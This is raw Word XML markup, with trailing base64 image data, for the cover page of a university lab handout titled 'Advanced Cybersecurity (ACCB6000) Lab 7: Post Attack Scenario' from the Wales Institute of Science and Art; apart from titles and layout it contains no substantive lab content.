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15A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="279" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3780"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3780"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-4027" w:right="539" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Applied Computing </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3780"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-4027" w:right="539" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-461009</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-769999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2749550" cy="917575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8821" name="Picture 8821"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="8821" name="Picture 8821"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2749550" cy="917575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Wales Institute of Science and Art (WISA) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>817626</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6188710" cy="1757921"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="8745" name="Group 8745"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6188710" cy="1757921"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6188710" cy="1757921"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="16" name="Rectangle 16"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="131445"/>
                            <a:ext cx="45808" cy="206453"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="17" name="Rectangle 17"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="472822"/>
                            <a:ext cx="45808" cy="206453"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="18" name="Rectangle 18"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="812674"/>
                            <a:ext cx="45808" cy="206453"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="19" name="Rectangle 19"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1154050"/>
                            <a:ext cx="45808" cy="206453"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="20" name="Rectangle 20"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1495426"/>
                            <a:ext cx="45808" cy="206453"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="40" name="Rectangle 40"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="946404" y="0"/>
                            <a:ext cx="5106444" cy="344777"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Advanced </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t>Cybersecurity</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> (ACCB6000) </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="41" name="Rectangle 41"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4783836" y="10288"/>
                            <a:ext cx="72377" cy="326195"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="38"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="43" name="Rectangle 43"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1296924" y="1304048"/>
                            <a:ext cx="633325" cy="370673"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Lab </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="44" name="Rectangle 44"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1772412" y="1304048"/>
                            <a:ext cx="191655" cy="370673"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>7</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="8739" name="Rectangle 8739"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1917192" y="1304048"/>
                            <a:ext cx="108464" cy="370673"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="8740" name="Rectangle 8740"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1999485" y="1304048"/>
                            <a:ext cx="92142" cy="370673"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="46" name="Rectangle 46"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2069592" y="1304048"/>
                            <a:ext cx="3144413" cy="370673"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Post Attack Scenario</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="47" name="Rectangle 47"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4434840" y="1304048"/>
                            <a:ext cx="92142" cy="370673"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8822" name="Picture 8822"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="371475" y="88774"/>
                            <a:ext cx="5184775" cy="1622425"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8823" name="Picture 8823"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="5626100" y="561849"/>
                            <a:ext cx="561975" cy="606425"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8824" name="Picture 8824"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3133725" y="644399"/>
                            <a:ext cx="333375" cy="415925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 8745" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:64.4pt;width:487.3pt;height:138.4pt;z-index:251659264" coordsize="61887,175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